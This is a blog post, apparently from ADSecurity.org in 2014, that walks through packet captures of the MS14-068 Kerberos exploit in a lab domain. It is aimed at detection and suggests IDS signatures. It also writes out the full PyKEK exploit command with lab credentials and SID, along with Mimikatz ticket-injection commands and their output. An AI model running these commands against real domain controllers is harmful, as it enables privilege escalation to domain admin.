{"id":763,"date":"2014-12-15T21:09:10","date_gmt":"2014-12-16T02:09:10","guid":{"rendered":"http:\/\/adsecurity.org\/?p=763"},"modified":"2015-12-30T11:53:00","modified_gmt":"2015-12-30T16:53:00","slug":"pykek-kerberos-packets-on-the-wire-aka-how-the-ms14-068-exploit-works","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=763","title":{"rendered":"Detecting MS14-068 Kerberos Exploit Packets on the Wire aka How the PyKEK Exploit Works"},"content":{"rendered":"<h4><span style=\"text-decoration: underline;\">MS14-068 References:<\/span><\/h4>\n<ul>\n<li><a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">AD Kerberos Privilege Elevation Vulnerability: The Issue<\/a><\/li>\n<li><a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">Detailed Explanation of MS14-068<\/a><\/li>\n<li><a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK)<\/a><\/li>\n<li><a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a><\/li>\n<\/ul>\n<p>This post shows the packet captures I performed using WireShark on the Domain Controllers during stage 1 and stage 2 of the attack.<br \/>\nMicrosoft KB3011780 patches this issue.<\/p>\n<p><span style=\"text-decoration: underline;\">Here are the full packet captures:<\/span><\/p>\n<p>Stage 1 &#8211; Using PyKEK to inject a forged PAC into a valid TGT: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets<\/a><\/p>\n<p>Stage 2 &#8211; Using Mimikatz to leverage the forged TGT into the user session &amp; connect to the unpatched Domain Controller&#8217;s admin$ share: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access<\/a><\/p>\n<p><em>Note: Using the information posted here, it may be possible to create a Snort signature that can identify active MS14-068 exploitation on a network by looking at the TGS-REQ Kerberos packet that states &#8220;include-pac: False&#8221; (additionally, the AS-REQ packet earlier in the conversation also states &#8220;include-pac: False&#8221;)<br \/>\n<\/em><\/p>\n<h3><span style=\"text-decoration: underline;\">Stage 1 Attack Packets: PyKEK requests and modifies a TGT<\/span><\/h3>\n<blockquote><p><em>.<\/em>The Python script performs a TGT request (Kerberos Authentication Service Request aka AS-REQ) and instead of requesting a TGT with a PAC (default AS-REQ), PyKEK requests a TGT with no PAC from the Domain Controller.<\/p>\n<p>Once the script receives the valid TGT without a PAC from the DC, the script generates a PAC (with the group membership listed above) packages it in encrypted authorization data as part of a TGS request to the DC (Kerberos Ticket Granting Service Request aka TGS-REQ) to obtain another TGT (a new one with the PyKEK generated PAC).<br \/>\n&#8220;The vulnerable KDC will verify it with MD5 and give you another TGT with a PAC in it&#8221;.<br \/>\nThis is the TGT that PyKEK saves to the ccache file used for stage 2.<\/p>\n<p>Since PyKEK communicates with the Domain Controller for valid TGTs, the TGT is a valid ticket (other than the forged PAC it includes). To summarize, there are two TGTs involved in the process: the original one without a PAC as a result of the first AS-REQ and a second one the DC delivers in the TGS-REP with the PyKEK generated PAC.<\/p>\n<p><em>NOTE: The TGT is technically not modified by PyKEK since it is encrypted by the KDC account (KRBTGT). The process the script uses results in a valid TGT with the PAC PyKEK created that is accepted by an unpatched DC. The genius part of this is that PyKEK uses the Kerberos AS &amp; TGS exchanges to forge a PAC and have the DC place it into a new user TGT. Then when the TGT is presented later on in Stage 2 for a valid TGS, the PAC is accepted and its values carried on into the new TGS for a Kerberos service in AD.<\/em><\/p><\/blockquote>\n<p><em>From the post entitled &#8220;<a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a>&#8220;<strong><br \/>\n<\/strong><\/em><\/p>\n<p><strong><em>c:\\Temp\\pykek&gt; ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org<\/em><\/strong><\/p>\n<p><em>[+] Building AS-REQ for adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Sending AS-REQ to adsdc02.lab.adsecurity.org\u2026 Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #1: TGT request (AS-REQ) with no PAC.<\/strong><\/p>\n<p><!--more--><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-775\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11.png\" alt=\"ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet1\" width=\"827\" height=\"943\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11.png 827w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11-263x300.png 263w\" sizes=\"auto, (max-width: 827px) 100vw, 827px\" \/><\/a><\/p>\n<p><strong>NOTE: The AS-REQ for the TGT requests a TGT with no PAC. <em>This may be useful for creating a Snort signature to detect attempted MS14-068 exploitation on the network.<\/em><br \/>\n<\/strong>Compare this with a TGT request (AS-REQ) from a Windows client (Windows 7) which requests a PAC by default (click thumbnail to embiggen):<strong><br \/>\n<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-ASREQ-Packet1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-792\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-ASREQ-Packet1-150x150.png\" alt=\"ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-ASREQ-Packet1\" width=\"150\" height=\"150\" \/><\/a><br \/>\n<\/strong><\/p>\n<p><em>[+] Receiving AS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #2: TGT Response (AS-REP) which returns the KDC encrypted TGT to the client.<br \/>\n<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-773\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2.png\" alt=\"ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2\" width=\"853\" height=\"565\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2.png 853w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2-300x198.png 300w\" sizes=\"auto, (max-width: 853px) 100vw, 853px\" \/><\/a><\/p>\n<p><em>[+] Parsing AS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Building TGS-REQ for adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Sending TGS-REQ to adsdc02.lab.adsecurity.org\u2026 Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #3: The TGS request notes no PAC should be included and there is an authenticator provided (the generated PAC).<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREQ-Packet3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-774\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREQ-Packet3.png\" alt=\"ADS-PyKEK-Exploit-Stage1-KRB5-TGSREQ-Packet3\" width=\"836\" height=\"965\" \/><\/a><\/p>\n<p><strong>NOTE: The TGS-REQ provides the PAC as part of the request (though no PAC is requested). <em>This can be used to create an IDS signature to detect attempted MS14-068 exploitation on the network.<\/em><br \/>\n<\/strong>Compare this with a TGS request (TGS-REQ) from a Windows client (Windows 7) which doesn&#8217;t have &#8220;include-pac:False&#8221;<br \/>\n(click thumbnail to embiggen):<strong><br \/>\n<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREQ-Packet2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-804\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREQ-Packet2-150x150.png\" alt=\"ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREQ-Packet2\" width=\"150\" height=\"150\" \/><\/a><br \/>\n<\/strong><\/p>\n<p><em>[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #4: The TGS response includes the new TGT which uses MD5 (unkeyed).<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-808 size-full\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41.png\" alt=\"\" width=\"863\" height=\"555\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41.png 863w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41-300x192.png 300w\" sizes=\"auto, (max-width: 863px) 100vw, 863px\" \/><\/a><\/p>\n<p><strong>Compare this with a TGS response (TGS-REP) from a Windows client (Windows 7) in which the ticket component contains an &#8220;enc-part&#8221; with the etype: &#8220;eTYPE-AES256-CTS-HMAC-SHA1-96 (18)&#8221; which is a keyed SHA1 hash.<\/strong><br \/>\n(click thumbnail to embiggen):<strong><br \/>\n<\/strong>\u00a0<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREP-Packet3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-806\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREP-Packet3-150x150.png\" alt=\"ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREP-Packet3\" width=\"150\" height=\"150\" \/><\/a><\/p>\n<p><em>[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Creating ccache file \u2018TGT_darthsidious@lab.adsecurity.org.ccache\u2019\u2026 Done!<\/em><\/p>\n<h5><strong>Stage 1 is now complete with a forged TGT.<br \/>\n<\/strong><\/h5>\n<p>&nbsp;<\/p>\n<h3><span style=\"text-decoration: underline;\">Stage 2 Attack Packets: Using Mimikatz to leverage the forged TGT &amp; connect to DC Admin$ Share:<br \/>\n<\/span><\/h3>\n<p>This stage leverages Mimikatz to clear the existing Kerberos tickets in memory for the current user and places the TGT created in Stage 1 into memory for use.<br \/>\nAt this point, the user can connect to the unpatched DC with full admin credentials. The act of attempting to connect to the Admin$ share on the DC generates a TGS-REQ and resulting TGS-REP (with a KRB-ERR mixed in for spice).<\/p>\n<p><em><strong>\u00a0c:\\Temp\\pykek&gt; c:\\temp\\mimikatz\\mimikatz.exe \u201ckerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache\u201d exit<\/strong><\/em><\/p>\n<p>.#####.\u00a0\u00a0 mimikatz 2.0 alpha (x64) release \u201cKiwi en C\u201d (Nov 20 2014 01:35:45)<br \/>\n.## ^ ##.<br \/>\n## \/ \\ ##\u00a0 \/* * *<br \/>\n## \\ \/ ##\u00a0\u00a0 Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )<br \/>\n\u2018## v ##\u2019\u00a0\u00a0 http:\/\/blog.gentilkiwi.com\/mimikatz\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (oe.eo)<br \/>\n\u2018#####\u2019\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 with 15 modules * * *\/<\/p>\n<p>mimikatz(commandline) # kerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache<br \/>\nPrincipal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nData 0<br \/>\nStart\/End\/MaxRenew: 12\/7\/2014 3:10:30 PM ; 12\/8\/2014 1:10:30 AM ; 12\/14\/2014 3:10:30 PM<br \/>\nService Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nTarget Name\u00a0 (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nClient Name\u00a0 (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nFlags 50a00000\u00a0\u00a0\u00a0 : pre_authent ; renewable ; proxiable ; forwardable ;<br \/>\nSession Key\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000017 \u2013 rc4_hmac_nt<br \/>\naf5e7b47316c4cebae0a7ead04059799<br \/>\nTicket\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000000 \u2013 null\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; kvno = 2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [\u2026]<br \/>\n* Injecting ticket : OK<\/p>\n<p>mimikatz(commandline) # exit<br \/>\nBye!<\/p>\n<p><strong><em> c:\\Temp\\pykek&gt; net use \\\\adsdc02.lab.adsecurity.org\\admin$<\/em><br \/>\n<\/strong><\/p>\n<p><strong>Stage 2 Packet #1: The first TGS-REQ for the Admin$ share on the DC using the forged TGT.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-768\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13\" width=\"766\" height=\"964\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13.png 766w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13-238x300.png 238w\" sizes=\"auto, (max-width: 766px) 100vw, 766px\" \/><\/a><\/p>\n<p><strong>Stage 2 Packet #2: Kerberos Error response due to &#8220;eRR-ETYPE-NOSUPP (14)&#8221; error due to the request including encryption type (etype) eTYPE-AES256-CTS-HMAC-SHA1-96 (18). This is interesting since the TGS-REP shows this etype is indeed supported.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-769\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14\" width=\"861\" height=\"356\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14.png 861w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14-300x124.png 300w\" sizes=\"auto, (max-width: 861px) 100vw, 861px\" \/><\/a><\/p>\n<p><strong>Stage 2 Packet #3<\/strong>: <strong>The second TGS-REQ for the Admin$ share on the DC.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-770\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15\" width=\"759\" height=\"964\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15.png 759w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15-236x300.png 236w\" sizes=\"auto, (max-width: 759px) 100vw, 759px\" \/><\/a><\/p>\n<p><strong>Stage 2 Packet #4: The TGS-REP to the second\u00a0 TGS-REQ for the Admin$ share on the DC.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-771\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16\" width=\"860\" height=\"541\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16.png 860w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16-300x188.png 300w\" sizes=\"auto, (max-width: 860px) 100vw, 860px\" \/><\/a><\/p>\n<p>From here, the user has a valid TGS for the CIFS service on the DC and can use it to access the admin$ share via SMB.<\/p>\n<h3>References:<\/h3>\n<ul>\n<li><a href=\"http:\/\/msdn.microsoft.com\/en-us\/library\/cc237917.aspx\">Microsoft Kerberos Privileged Attribute Certificate (PAC) Specification<\/a><\/li>\n<li><a href=\"http:\/\/msdn.microsoft.com\/en-us\/library\/cc246080.aspx\">Microsoft Kerberos Overview<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>MS14-068 References: AD Kerberos Privilege Elevation Vulnerability: The Issue Detailed Explanation of MS14-068 MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK) Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK) This post shows the packet captures I performed using WireShark on the Domain Controllers during stage 1 and &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=763\">Continue reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,2],"tags":[20,380,101,59,337,80,81,331,298,340,207,295,334,333,341,697,332,22,329,339,330,342],"class_list":["post-763","post","type-post","status-publish","format-standard","hentry","category-microsoft-security","category-technical-reference","tag-activedirectory","tag-cve-2014-6324poc","tag-domaincontroller","tag-kalilinux","tag-kb3011780","tag-kdc","tag-kerberos","tag-kerberoschecksumvulnerability","tag-kerberoshacking","tag-kerberospacketcapture","tag-mimikatz","tag-ms14068","tag-ms14068exploit","tag-ms14068exploitcode","tag-ms14068exploitpacketcapture","tag-pac","tag-poc","tag-powershellcode","tag-pykek","tag-pykekpackets","tag-pythonkerberosexploitationkit","tag-wireshark","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=763"}],"version-history":[{"count":22,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/763\/revisions"}],"predecessor-version":[{"id":2343,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/763\/revisions\/2343"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}